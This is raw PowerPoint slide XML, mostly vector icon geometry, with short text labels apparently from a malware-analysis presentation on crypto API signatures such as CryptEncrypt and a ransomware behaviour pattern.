                  <a:pt x="77633" y="182989"/>
                  <a:pt x="80713" y="182124"/>
                  <a:pt x="82825" y="179978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97811" y="164576"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="98884" y="163469"/>
                  <a:pt x="100684" y="163469"/>
                  <a:pt x="101792" y="164576"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116744" y="179978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="118855" y="182124"/>
                  <a:pt x="121935" y="182989"/>
                  <a:pt x="124843" y="182193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127750" y="181397"/>
                  <a:pt x="130000" y="179113"/>
                  <a:pt x="130761" y="176206"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="136057" y="155404"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="136437" y="153881"/>
                  <a:pt x="137995" y="152981"/>
                  <a:pt x="139483" y="153431"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="160181" y="159281"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="163088" y="160111"/>
                  <a:pt x="166203" y="159281"/>
                  <a:pt x="168314" y="157169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="170426" y="155058"/>
                  <a:pt x="171256" y="151943"/>
                  <a:pt x="170426" y="149036"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164576" y="128338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164161" y="126850"/>
                  <a:pt x="165061" y="125293"/>
                  <a:pt x="166549" y="124912"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="187385" y="119616"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190292" y="118889"/>
                  <a:pt x="192577" y="116605"/>
                  <a:pt x="193373" y="113698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194169" y="110790"/>
                  <a:pt x="193304" y="107675"/>
                  <a:pt x="191158" y="105599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="175756" y="90612"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="174648" y="89539"/>
                  <a:pt x="174648" y="87739"/>
                  <a:pt x="175756" y="86632"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="191158" y="71645"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="193304" y="69534"/>
                  <a:pt x="194169" y="66453"/>
                  <a:pt x="193373" y="63546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="192577" y="60639"/>
                  <a:pt x="190292" y="58389"/>
                  <a:pt x="187385" y="57628"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166549" y="52332"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="165026" y="51951"/>
                  <a:pt x="164126" y="50394"/>
                  <a:pt x="164576" y="48906"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="170426" y="28208"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="171256" y="25301"/>
                  <a:pt x="170426" y="22186"/>
                  <a:pt x="168314" y="20074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166203" y="17963"/>
                  <a:pt x="163088" y="17133"/>
                  <a:pt x="160181" y="17963"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139483" y="23812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137995" y="24228"/>
                  <a:pt x="136437" y="23328"/>
                  <a:pt x="136057" y="21840"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130761" y="969"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="130034" y="-1938"/>
                  <a:pt x="127750" y="-4223"/>
                  <a:pt x="124843" y="-5019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121935" y="-5815"/>
                  <a:pt x="118855" y="-4949"/>
                  <a:pt x="116744" y="-2804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="101757" y="12633"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100684" y="13741"/>
                  <a:pt x="98884" y="13741"/>
                  <a:pt x="97777" y="12633"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="82790" y="-2769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4" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465674" y="4058093"/>
            <a:ext cx="1187302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5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RSA Operations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4004930" y="4465674"/>
            <a:ext cx="3012558" cy="1435395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3012558" h="1435395">
                <a:moveTo>
                  <a:pt x="35440" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2977118" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2996691" y="0"/>
                  <a:pt x="3012558" y="15867"/>
                  <a:pt x="3012558" y="35440"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3012558" y="1399955"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3012558" y="1419528"/>
                  <a:pt x="2996691" y="1435395"/>
                  <a:pt x="2977118" y="1435395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35440" y="1435395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15867" y="1435395"/>
                  <a:pt x="0" y="1419528"/>
                  <a:pt x="0" y="1399955"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35440"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15867"/>
                  <a:pt x="15867" y="0"/>
                  <a:pt x="35440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Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111256" y="4572000"/>
            <a:ext cx="2861930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// RSA Key Exchange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111256" y="4784651"/>
            <a:ext cx="2861930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CryptImportKey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111256" y="4961860"/>
            <a:ext cx="2861930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CryptEncrypt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4111256" y="5139070"/>
            <a:ext cx="2861930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CryptDecrypt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4004930" y="6009610"/>
            <a:ext cx="3083442" cy="63795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Asymmetric encryption for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A458"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E0A458">
                    <a:alpha val="20000"/>
                  </a:srgbClr>
                </a:highlight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secure key exchange </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116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and C2 communication. Public key cryptography enables protected channel establishment.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7304567" y="1527544"/>
            <a:ext cx="4525926" cy="2700670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4525926" h="2700670">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4525926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4525926" y="2700670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2700670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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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42" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472030" y="1708296"/>
            <a:ext cx="177209" cy="177209"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="177209" h="177209">
                <a:moveTo>
                  <a:pt x="16613" y="88605"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16613" y="48836"/>
                  <a:pt x="48836" y="16613"/>
                  <a:pt x="88605" y="16613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110444" y="16613"/>
                  <a:pt x="130000" y="26339"/>
                  <a:pt x="143221" y="41706"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="146198" y="45202"/>
                  <a:pt x="151459" y="45583"/>
                  <a:pt x="154920" y="42606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158381" y="39630"/>
                  <a:pt x="158796" y="34369"/>
                  <a:pt x="155820" y="30908"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="139587" y="11975"/>
                  <a:pt x="115498" y="0"/>
                  <a:pt x="88605" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39664" y="0"/>
                  <a:pt x="0" y="39664"/>
                  <a:pt x="0" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="102449"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="107052"/>
                  <a:pt x="3703" y="110756"/>
                  <a:pt x="8307" y="110756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12910" y="110756"/>
                  <a:pt x="16613" y="107052"/>
                  <a:pt x="16613" y="102449"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16613" y="88605"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="175306" y="70295"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="174371" y="65796"/>
                  <a:pt x="169941" y="62923"/>
                  <a:pt x="165476" y="63892"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161011" y="64861"/>
                  <a:pt x="158104" y="69257"/>
                  <a:pt x="159073" y="73722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160077" y="78533"/>
                  <a:pt x="160631" y="83517"/>
                  <a:pt x="160631" y="88639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="160631" y="102484"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160631" y="107087"/>
                  <a:pt x="164334" y="110790"/>
                  <a:pt x="168937" y="110790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173541" y="110790"/>
                  <a:pt x="177244" y="107087"/>
                  <a:pt x="177244" y="102484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="177244" y="88639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="177244" y="82375"/>
                  <a:pt x="176586" y="76248"/>
                  <a:pt x="175340" y="70330"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="88605" y="27689"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="82029" y="27689"/>
                  <a:pt x="75660" y="28727"/>
                  <a:pt x="69742" y="30666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64481" y="32396"/>
                  <a:pt x="63269" y="38868"/>
                  <a:pt x="66869" y="43091"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69326" y="45964"/>
                  <a:pt x="73376" y="46829"/>
                  <a:pt x="77045" y="45825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80713" y="44821"/>
                  <a:pt x="84590" y="44302"/>
                  <a:pt x="88605" y="44302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113075" y="44302"/>
                  <a:pt x="132907" y="64135"/>
                  <a:pt x="132907" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="132907" y="97223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="132907" y="105945"/>
                  <a:pt x="132388" y="114632"/>
                  <a:pt x="131384" y="123285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130796" y="128338"/>
                  <a:pt x="134638" y="132907"/>
                  <a:pt x="139760" y="132907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143844" y="132907"/>
                  <a:pt x="147340" y="129930"/>
                  <a:pt x="147824" y="125881"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="148967" y="116397"/>
                  <a:pt x="149555" y="106845"/>
                  <a:pt x="149555" y="97257"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="149555" y="88639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149555" y="54997"/>
                  <a:pt x="122281" y="27724"/>
                  <a:pt x="88639" y="27724"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="52159" y="51467"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="49009" y="47798"/>
                  <a:pt x="43402" y="47521"/>
                  <a:pt x="40426" y="51328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32431" y="61643"/>
                  <a:pt x="27689" y="74553"/>
                  <a:pt x="27689" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27689" y="97223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="27689" y="105599"/>
                  <a:pt x="26789" y="113975"/>
                  <a:pt x="24989" y="122108"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23812" y="127508"/>
                  <a:pt x="27724" y="132872"/>
                  <a:pt x="33261" y="132872"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36896" y="132872"/>
                  <a:pt x="40149" y="130450"/>
                  <a:pt x="40945" y="126885"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43160" y="117159"/>
                  <a:pt x="44302" y="107225"/>
                  <a:pt x="44302" y="97188"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="88570"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44302" y="79156"/>
                  <a:pt x="47244" y="70434"/>
                  <a:pt x="52228" y="63269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54720" y="59670"/>
                  <a:pt x="54997" y="54755"/>
                  <a:pt x="52159" y="51432"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="88605" y="55378"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="70261" y="55378"/>
                  <a:pt x="55378" y="70261"/>
                  <a:pt x="55378" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55378" y="97223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55378" y="109648"/>
                  <a:pt x="53786" y="121970"/>
                  <a:pt x="50602" y="133945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49286" y="138895"/>
                  <a:pt x="52921" y="143983"/>
                  <a:pt x="58043" y="143983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61331" y="143983"/>
                  <a:pt x="64238" y="141837"/>
                  <a:pt x="65104" y="138652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68738" y="125154"/>
                  <a:pt x="70607" y="111240"/>
                  <a:pt x="70607" y="97223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70607" y="88605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70607" y="78671"/>
                  <a:pt x="78671" y="70607"/>
                  <a:pt x="88605" y="70607"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98538" y="70607"/>
                  <a:pt x="106602" y="78671"/>
                  <a:pt x="106602" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="106602" y="97223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106602" y="109787"/>
                  <a:pt x="105391" y="122281"/>
                  <a:pt x="103003" y="134568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102068" y="139379"/>
                  <a:pt x="105668" y="143983"/>
                  <a:pt x="110548" y="143983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114078" y="143983"/>
                  <a:pt x="117124" y="141560"/>
                  <a:pt x="117816" y="138099"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120482" y="124670"/>
                  <a:pt x="121831" y="110998"/>
                  <a:pt x="121831" y="97223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121831" y="88605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121831" y="70261"/>
                  <a:pt x="106949" y="55378"/>
                  <a:pt x="88605" y="55378"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="96911" y="88605"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="96911" y="84001"/>
                  <a:pt x="93208" y="80298"/>
                  <a:pt x="88605" y="80298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84001" y="80298"/>
                  <a:pt x="80298" y="84001"/>
                  <a:pt x="80298" y="88605"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80298" y="97223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80298" y="117955"/>
                  <a:pt x="76491" y="138514"/>
                  <a:pt x="69049" y="157862"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67007" y="163157"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="65346" y="167449"/>
                  <a:pt x="67492" y="172260"/>
                  <a:pt x="71784" y="173887"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76075" y="175513"/>
                  <a:pt x="80886" y="173402"/>
                  <a:pt x="82513" y="169110"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84555" y="163815"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92723" y="142563"/>
                  <a:pt x="96911" y="119997"/>
                  <a:pt x="96911" y="97223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96911" y="88605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3" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671391" y="1672854"/>
            <a:ext cx="4102395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Crypto Signatures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449879" y="2027273"/>
            <a:ext cx="4235302" cy="637953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4235302" h="637953">
                <a:moveTo>
                  <a:pt x="35445" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4199858" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4219433" y="0"/>
                  <a:pt x="4235302" y="15869"/>
                  <a:pt x="4235302" y="35445"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4235302" y="602509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4235302" y="622084"/>
                  <a:pt x="4219433" y="637953"/>
                  <a:pt x="4199858" y="637953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35445" y="637953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15869" y="637953"/>
                  <a:pt x="0" y="622084"/>
                  <a:pt x="0" y="602509"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35445"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15882"/>
                  <a:pt x="15882" y="0"/>
                  <a:pt x="35445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5" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573925" y="2161953"/>
            <a:ext cx="141767" cy="141767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="141767" h="141767">
                <a:moveTo>
                  <a:pt x="18247" y="63269"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21930" y="37519"/>
                  <a:pt x="44109" y="17721"/>
                  <a:pt x="70884" y="17721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85559" y="17721"/>
                  <a:pt x="98850" y="23674"/>
                  <a:pt x="108485" y="33282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108541" y="33338"/>
                  <a:pt x="108596" y="33393"/>
                  <a:pt x="108651" y="33448"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110756" y="35442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97493" y="35442"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92592" y="35442"/>
                  <a:pt x="88632" y="39401"/>
                  <a:pt x="88632" y="44302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88632" y="49203"/>
                  <a:pt x="92592" y="53163"/>
                  <a:pt x="97493" y="53163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="132935" y="53163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137836" y="53163"/>
                  <a:pt x="141795" y="49203"/>
                  <a:pt x="141795" y="44302"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="141795" y="8860"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="141795" y="3960"/>
                  <a:pt x="137836" y="0"/>
                  <a:pt x="132935" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128034" y="0"/>
                  <a:pt x="124074" y="3960"/>
                  <a:pt x="124074" y="8860"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124074" y="23646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120945" y="20684"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="108125" y="7919"/>
                  <a:pt x="90404" y="0"/>
                  <a:pt x="70884" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35165" y="0"/>
                  <a:pt x="5621" y="26415"/>
                  <a:pt x="720" y="60777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="65623"/>
                  <a:pt x="3378" y="70108"/>
                  <a:pt x="8224" y="70801"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13069" y="71493"/>
                  <a:pt x="17555" y="68115"/>
                  <a:pt x="18247" y="63297"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="141048" y="80990"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="141740" y="76145"/>
                  <a:pt x="138362" y="71659"/>
                  <a:pt x="133544" y="70967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128726" y="70275"/>
                  <a:pt x="124213" y="73653"/>
                  <a:pt x="123520" y="78470"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119838" y="104221"/>
                  <a:pt x="97659" y="124019"/>
                  <a:pt x="70884" y="124019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56209" y="124019"/>
                  <a:pt x="42918" y="118066"/>
                  <a:pt x="33282" y="108458"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33227" y="108402"/>
                  <a:pt x="33171" y="108347"/>
                  <a:pt x="33116" y="108291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31012" y="106298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44275" y="106298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49176" y="106298"/>
                  <a:pt x="53135" y="102338"/>
                  <a:pt x="53135" y="97437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53135" y="92536"/>
                  <a:pt x="49176" y="88577"/>
                  <a:pt x="44275" y="88577"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8860" y="88605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6507" y="88605"/>
                  <a:pt x="4236" y="89546"/>
                  <a:pt x="2575" y="91235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="914" y="92924"/>
                  <a:pt x="-28" y="95167"/>
                  <a:pt x="0" y="97548"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="277" y="132713"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="305" y="137614"/>
                  <a:pt x="4319" y="141546"/>
                  <a:pt x="9220" y="141491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14121" y="141435"/>
                  <a:pt x="18053" y="137448"/>
                  <a:pt x="17998" y="132547"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17887" y="118287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20850" y="121084"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="33670" y="133848"/>
                  <a:pt x="51363" y="141767"/>
                  <a:pt x="70884" y="141767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106602" y="141767"/>
                  <a:pt x="136147" y="115352"/>
                  <a:pt x="141048" y="80990"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6467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6" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782868" y="2133598"/>
            <a:ext cx="3866872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Ransomware Pattern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556205" y="2381691"/>
            <a:ext cx="4084674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Rapid file I/O + bulk encryption + key generation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449879" y="2736110"/>
            <a:ext cx="4235302" cy="637953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4235302" h="637953">
                <a:moveTo>
                  <a:pt x="35445" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4199858" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4219433" y="0"/>
                  <a:pt x="4235302" y="15869"/>
                  <a:pt x="4235302" y="35445"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4235302" y="602509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4235302" y="622084"/>
                  <a:pt x="4219433" y="637953"/>
                  <a:pt x="4199858" y="637953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35445" y="637953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15869" y="637953"/>
                  <a:pt x="0" y="622084"/>
                  <a:pt x="0" y="602509"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35445"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15882"/>
                  <a:pt x="15882" y="0"/>
                  <a:pt x="35445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9" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573925" y="2870791"/>
            <a:ext cx="141767" cy="141767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="141767" h="141767">
                <a:moveTo>
                  <a:pt x="139165" y="41700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="112583" y="68281"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110036" y="70828"/>
                  <a:pt x="106243" y="71576"/>
                  <a:pt x="102920" y="70191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99597" y="68807"/>
                  <a:pt x="97465" y="65595"/>
                  <a:pt x="97465" y="62023"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97465" y="44302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8860" y="44302"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3960" y="44302"/>
                  <a:pt x="0" y="40343"/>
                  <a:pt x="0" y="35442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="30541"/>
                  <a:pt x="3960" y="26581"/>
                  <a:pt x="8860" y="26581"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97465" y="26581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97465" y="8860"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="97465" y="5289"/>
                  <a:pt x="99625" y="2049"/>
                  <a:pt x="102948" y="665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106270" y="-720"/>
                  <a:pt x="110064" y="55"/>
                  <a:pt x="112611" y="2575"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139192" y="29156"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142653" y="32618"/>
                  <a:pt x="142653" y="38238"/>
